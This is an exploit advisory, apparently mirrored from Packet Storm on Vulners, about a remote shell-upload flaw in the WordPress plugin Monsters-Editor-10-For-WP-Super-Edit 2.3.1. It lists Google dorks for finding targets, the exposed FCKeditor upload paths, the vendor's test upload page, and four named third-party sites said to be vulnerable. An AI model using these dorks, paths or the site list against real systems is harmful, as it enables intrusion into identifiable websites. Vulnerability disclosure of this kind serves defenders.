Vulners
Lucene search
WordPress Monsters-Editor-10-For-WP-Super-Edit 2.3.1 Shell Upload
🗓️ 20 Dec 2018 00:00:00Reported by KingSkrupellosType 
packetstorm🔗 packetstormsecurity.com👁 82 Views
`###########################################################################################################
# Exploit Title : WordPress Monsters-Editor-10-For-WP-Super-Edit Plugins
2.3.1 Remote Shell Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 20/12/2018
# Vendor Homepage : thedevcouple.com ~
wordpress.org/plugins/monsters-editor-10-for-wp-super-edit/
+ github.com/wp-plugins/monsters-editor-10-for-wp-super-edit
# Software Download Link :
downloads.wordpress.org/plugin/monsters-editor-10-for-wp-super-edit.zip
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 2.1 and 2.3.1
# Exploit Risk : Medium
# Google Dorks :
inurl:''/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/''
+ intext:''Using the fMulti theme design by Fredrik Fahlstad Proudly
powered by WordPress.''
+ intext:''Website Design by Cynscreations.com.''
+ intext:''Powered by Aquino Media | Designed by Aquino Media Group''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
+ CWE-434: Unrestricted Upload of File with Dangerous Type
# Visit Web Security Blog and Forum : cyberizm.org [ Team ] ~
ayarsecurity.com [ Friend ]
###########################################################################################################
# Exploit :
/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html
/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/browser/default/browser.html
/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/browser/default/frmupload.html
# Directory File Path :
/wp-content/uploads/......
/wp-content/uploads/[YEAR]/[MONTH]....
#################################################################################################
# Note : This plugin Monsters-Editor-10-For-WP-Super-Edit contains a very
serious vulnerability that allowed hackers to gain full control a
modify, upload and execute files on any website running WordPress. With the
plugin installed on a certain website,
a hacker or malicious person can gain access to the web server via HTTP
through a backdoor in the pluginas directory.
###########################################################################################################
Vulnerable File Code => /test.html
********************************
<!--
* FCKeditor - The text editor for Internet - http://www.fckeditor.net
* Copyright (C) 2003-2007 Frederico Caldeira Knabben
*
* == BEGIN LICENSE ==
*
* Licensed under the terms of any of the following licenses at your
* choice:
*
* - GNU General Public License Version 2 or later (the "GPL")
* http://www.gnu.org/licenses/gpl.html
*
* - GNU Lesser General Public License Version 2.1 or later (the "LGPL")
* http://www.gnu.org/licenses/lgpl.html
*
* - Mozilla Public License Version 1.1 or later (the "MPL")
* http://www.mozilla.org/MPL/MPL-1.1.html
*
* == END LICENSE ==
*
* Test page for the "File Uploaders".
-->
<html>
<head>
<title>FCKeditor - Uploaders Tests</title>
<script language="javascript">
function SendFile()
{
var sUploaderUrl = cmbUploaderUrl.value ;
if ( sUploaderUrl.length == 0 )
sUploaderUrl = txtCustomUrl.value ;
if ( sUploaderUrl.length == 0 )
{
alert( 'Please provide your custom URL or select a default one' ) ;
return ;
}
eURL.innerHTML = sUploaderUrl ;
txtUrl.value = '' ;
frmUpload.action = sUploaderUrl ;
frmUpload.submit() ;
}
function OnUploadCompleted( errorNumber, fileUrl, fileName, customMsg )
{
switch ( errorNumber )
{
case 0 : // No errors
txtUrl.value = fileUrl ;
alert( 'File uploaded with no errors' ) ;
break ;
case 1 : // Custom error
alert( customMsg ) ;
break ;
case 10 : // Custom warning
txtUrl.value = fileUrl ;
alert( customMsg ) ;
break ;
case 201 :
txtUrl.value = fileUrl ;
alert( 'A file with the same name is already available. The uploaded file
has been renamed to "' + fileName + '"' ) ;
break ;
case 202 :
alert( 'Invalid file' ) ;
break ;
case 203 :
alert( "Security error. You probably don't have enough permissions to
upload. Please check your server." ) ;
break ;
default :
alert( 'Error on file upload. Error number: ' + errorNumber ) ;
break ;
}
}
</script>
</head>
<body>
<table cellSpacing="0" cellPadding="0" width="100%" border="0"
height="100%">
<tr>
<td>
<table cellSpacing="0" cellPadding="0" width="100%" border="0">
<tr>
<td nowrap>
Select the "File Uploader" to use:<br>
<select id="cmbUploaderUrl">
<option selected value="asp/upload.asp">ASP</option>
<option value="aspx/upload.aspx">ASP.Net</option>
<option value="cfm/upload.cfm">ColdFusion</option>
<option value="lasso/upload.lasso">Lasso</option>
<option value="php/upload.php">PHP</option>
<option value="">(Custom)</option>
</select>
</td>
<td nowrap> </td>
<td width="100%">
Custom Uploader URL:<BR>
<input id="txtCustomUrl" style="WIDTH: 100%; BACKGROUND-COLOR: #dcdcdc"
disabled type="text">
</td>
</tr>
</table>
<br>
<table cellSpacing="0" cellPadding="0" width="100%" border="0">
<tr>
<td noWrap>
<form id="frmUpload" target="UploadWindow" enctype="multipart/form-data"
action="" method="post">
Upload a new file:<br>
<input type="file" name="NewFile"><br>
<input type="button" value="Send it to the Server" onclick="SendFile();">
</form>
</td>
<td style="WIDTH: 16px"> </td>
<td vAlign="top" width="100%">
Uploaded File URL:<br>
<INPUT id="txtUrl" style="WIDTH: 100%" readonly type="text">
</td>
</tr>
</table>
<br>
Post URL: <span id="eURL"> </span>
</td>
</tr>
<tr>
<td height="100%">
<iframe name="UploadWindow" width="100%" height="100%"
src="javascript:void(0)"></iframe>
</td>
</tr>
</table>
</body>
</html>
###########################################################################################################
# Example Vulnerable Sites =>
[+]
dionysusrecords.com/main/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html
[+]
dfrere.fr/Blog01/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html
[+]
mark.langkau.org/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html
[+]
tonyaquino.com/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html
###########################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
###########################################################################################################
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Dec 2018 00:00Current
7.4High risk
Vulners AI Score7.4